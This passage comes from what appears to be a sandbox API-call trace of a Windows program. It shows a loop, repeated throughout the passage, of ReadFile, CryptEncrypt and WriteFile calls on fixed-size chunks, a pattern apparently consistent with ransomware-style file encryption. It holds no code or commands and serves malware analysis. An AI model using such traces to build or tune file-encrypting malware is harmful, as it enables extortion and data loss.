lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.336] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.336] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.336] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.336] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.336] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.336] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.337] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.337] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.337] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.337] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.337] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.337] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.338] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.338] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.338] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.338] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.338] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.339] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.340] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.340] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.341] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.341] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 